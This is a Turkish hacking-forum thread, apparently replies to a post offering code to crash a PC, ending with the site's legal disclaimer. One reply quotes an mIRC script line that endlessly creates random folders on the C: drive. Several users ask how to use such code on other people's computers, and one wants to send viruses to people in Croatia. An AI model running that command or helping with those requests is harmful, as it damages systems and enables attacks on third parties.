Bu kodla pc çökertin

karadagli74

Yeni üye
12 Ağu 2007
2
0
slm

evet arkadaslar bazi arkadaslarda aciklamislar denenmeyen bir program icin harike süper gibi yoromlar yapmayin eyerki gercekten denediyseniz olumluysa ozaman yorumlarinizi yapin saygilar tskler iyi paylasimlar

siegate

Yeni üye
18 Şub 2008
1
0
bişe sorucam bu yazdıın sey gercekten calısıosa metin belgesine yazıp bunu kaydetsek uzantıyıda cmd yapsak aynı şey olurmu ????

ynsbrc

Yeni üye
26 Ocak 2008
26
0
kardes yanlış anlamıyorsam bunu yazan herkesın pc coker dıyon bız nıye yazalım cokecekse??

frank

Yeni üye
27 Şub 2008
27
0
süper süper
kendi bilgisayarımızdan baska bilgisayara ulaşıp nasıl yapabiliriz
bulursan 10 numarasın helal be abi be mütiş

mozilla654

Üye
27 Şub 2008
85
0
saol kardeş başkasının pc ye giriyodum ama nasıl tamamiyle iş görmez yaparım onu bilmiyordum:::)))

fandg

Yeni üye
16 Mar 2008
11
0
denemeye tırsıorm :D denesemmi çöker möker dio deneyemiomda saol dien arkaaşlar denemişmi acaba

muammer_ademi

Yeni üye
7 Ocak 2008
8
0
istanbul
selam kardeslerim bende sizden birseyler ogrenmek isiyorum bana nasil virus gonderecegimi oretirmisin cunku ben simdilik hirvatistanda yasiyorum ve burada turkleri hic sevmiyorlar ve ben bunlara sinir oluyorum lutfen bana yardim edin de turkler kim mis oretelim bunlara saygilar kardeslerim cevap bekliyorum

Y1L4N

Yeni üye
29 Şub 2008
32
0
33
Trabzon
kardeşim adamlar denemiş işe yaramıyormuş kimiside yarıyor diyo bu işletim sisteminden kaynaklanabilir ama bana sorarsanız pc çökertme bu kadar basit bi kodla imkansız gibi geliyor.tabi denemedim o ayrı dava...

cesur6201

Üye
26 May 2008
77
1
timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
BUNUN Bİ PANZEYİRİ WARMI ?

??? EMEĞE SAYGI ???

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.